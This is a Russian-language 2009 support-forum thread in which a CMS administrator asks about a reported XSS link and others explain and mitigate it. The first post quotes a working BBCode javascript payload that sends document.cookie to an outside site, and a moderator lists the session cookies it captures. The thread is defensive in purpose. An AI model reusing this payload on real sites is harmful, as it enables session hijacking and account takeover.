Next Generation CMS :: Форум поддержки

Заинтересовала наша система? Тогда этот форум для Вас!

Вы не зашли.

Страницы 1

#1 2009-06-11 20:12:02

Luca
Участник
Зарегистрирован: 2009-03-19
Сообщений: 398
Рейтинг :   

Что делает следующий код?

Мне тут сообщили что в движке есть дырка и прислали код

[url=javascript:location.replace("http://bestwebart.ru/a.php?"+document.cookie)]Мессага[/url]

Как я поинмаю эта штука ворует кукисы. верно? На сколько это опасно и как это исправить? Чем для меня как админа может вылиться переход по этой ссылке?

Изменено Luca (2009-06-11 20:12:17)

Не в сети

#2 2009-06-11 20:36:09

infinity237
Модератор
Откуда Russia, Moscow
Зарегистрирован: 2008-11-09
Сообщений: 2,674
Рейтинг :   176 
Сайт

Re: Что делает следующий код?

1. В 0.9.0 Release действительно были свои активные XSS уязвимости, в комментариях, в SVN версии уже закрыты.
2. Если у тебя стоит "Автоурезание слов в комментариях" = 50, то код порежется и не обработается парсером.
3. В 0.9.0 Release, если ты перешёл по ссылке, то тебе лучше всего сменить пароль, т.к. ты в таком случае потенциально уязвим.
Скрипту отправляется инфа: PHPSESSID=сессия; zz_auth=cookie; com_username=логин; com_usermail=e-mail
Т.е. фактически можно расшифровать по cookie твой пароль.

P.S. Это называется php sniffer.

Изменено infinity237 (2009-06-11 20:38:49)

Не в сети

#3 2009-06-11 20:40:21

insider
Участник
Зарегистрирован: 2009-01-25
Сообщений: 229
Рейтинг :   35 
Сайт

Re: Что делает следующий код?

Пароль расшифровать нельзя, можно cookie подставить и зайти под сеансом админа
Нужно разлогиниться и залогиниться обратно, этого достаточно

Не в сети

#4 2009-06-11 20:45:39

infinity237
Модератор
Откуда Russia, Moscow
Зарегистрирован: 2008-11-09
Сообщений: 2,674
Рейтинг :   176 
Сайт

Re: Что делает следующий код?

Пароль расшифровать нельзя

o_O

Можно объяснить почему это нельзя?

Не в сети

#5 2009-06-11 20:55:19

insider
Участник
Зарегистрирован: 2009-01-25
Сообщений: 229
Рейтинг :   35 
Сайт

Re: Что делает следующий код?

Хорошо, тогда расшифруй 6c1facadd7c364630508e7ee5756ad85
zz_auth -- идентификатор сессии, он же содержится в поле authcookie таблицы юзеров

Не в сети

#6 2009-06-11 21:04:15

infinity237
Модератор
Откуда Russia, Moscow
Зарегистрирован: 2008-11-09
Сообщений: 2,674
Рейтинг :   176 
Сайт

Re: Что делает следующий код?

Прошу прощения, действительно был не прав...
Всё сделано по-хитрожопому... )

Не в сети

#7 2009-06-11 21:11:55

Luca
Участник
Зарегистрирован: 2009-03-19
Сообщений: 398
Рейтинг :   

Re: Что делает следующий код?

А что дает автоурезание слов? Оно кукисы на выходе порежет? Просто в CMS есть баг из-за которого длинные ссылки дать нельзя -они урезаются "урезателем длинных слов", так что приходится ставить максимальную длинну слова в несколько сотен символов.

Не в сети

#8 2009-06-11 21:39:17

infinity237
Модератор
Откуда Russia, Moscow
Зарегистрирован: 2008-11-09
Сообщений: 2,674
Рейтинг :   176 
Сайт

Re: Что делает следующий код?

автоурезание как раз и не даёт таким ссылкам пройти...

Не в сети

#9 2010-01-27 06:30:03

mittus
Участник
Зарегистрирован: 2010-01-24
Сообщений: 155
Рейтинг :   

Re: Что делает следующий код?

Luca пишет:

А что дает автоурезание слов? Оно кукисы на выходе порежет? Просто в CMS есть баг из-за которого длинные ссылки дать нельзя -они урезаются "урезателем длинных слов", так что приходится ставить максимальную длинну слова в несколько сотен символов.

Лучше на 20 поставить, ссылочки в комментариях не так важны, как безопасность. При желании можно и поудалять пробельчики, если нужно перейти по ссылке smile

Не в сети

Страницы 1

Подвал раздела

Работает на FluxBB